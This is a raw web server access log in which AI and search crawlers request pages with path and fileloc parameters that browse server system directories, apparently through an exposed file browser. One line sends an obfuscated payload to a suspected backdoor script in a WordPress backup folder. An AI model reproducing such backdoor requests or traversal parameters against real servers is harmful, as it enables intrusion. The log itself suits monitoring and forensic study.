74.7.227.51 - - [10/Nov/2025:00:01:28 +0000] "GET /223nwjch8463.html?path=/var/www HTTP/1.1" 200 3731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:01:30 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fclass%2Finput%2Fevent0%2Fdevice%2Fsubsystem%2Finput0%2Fsubsystem%2Fevent1%2Fdevice%2Fcapabilities%2Fsw&path=%2F%2Fsys%2Fclass%2Finput%2Fevent0%2Fdevice%2Fsubsystem%2Finput0%2Fsubsystem%2Fevent1%2Fdevice%2Fcapabilities HTTP/1.1" 200 2692 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
100.29.63.24 - - [10/Nov/2025:00:01:31 +0000] "GET /our-works/tvc-sjc/?path=//sys/module/sr_mod HTTP/1.1" 200 3020 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:01:33 +0000] "GET /4jjw1924.html?fileloc=//bin/usbreset&path=//bin HTTP/1.1" 200 2596 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:01:33 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/subsystem/devices/memory13/subsystem/devices/memory9 HTTP/1.1" 200 3419 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:01:34 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Fdrivers%2Fclk%2FKconfig&path=%2F%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Fdrivers%2Fclk HTTP/1.1" 200 5547 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
18.214.138.148 - - [10/Nov/2025:00:01:35 +0000] "GET /our-works/tvc-calci/?path=//usr/share/doc/php7.4-cgi HTTP/1.1" 200 3374 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.79.248.20 - - [10/Nov/2025:00:01:38 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733363337382p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733323737382q6266626235393031366364633563386532323564636133313661623130643363222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.51 - - [10/Nov/2025:00:01:38 +0000] "GET /4jjw1924.html?fileloc=//bin/colcrt&path=//bin HTTP/1.1" 200 2595 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:01:38 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory11/subsystem/devices/memory11/subsystem/devices/memory6 HTTP/1.1" 200 3411 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.215.24.66 - - [10/Nov/2025:00:01:41 +0000] "GET /our-works/tvc-bia-hello/?path=//var/cache/man/pt_BR HTTP/1.1" 200 3131 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
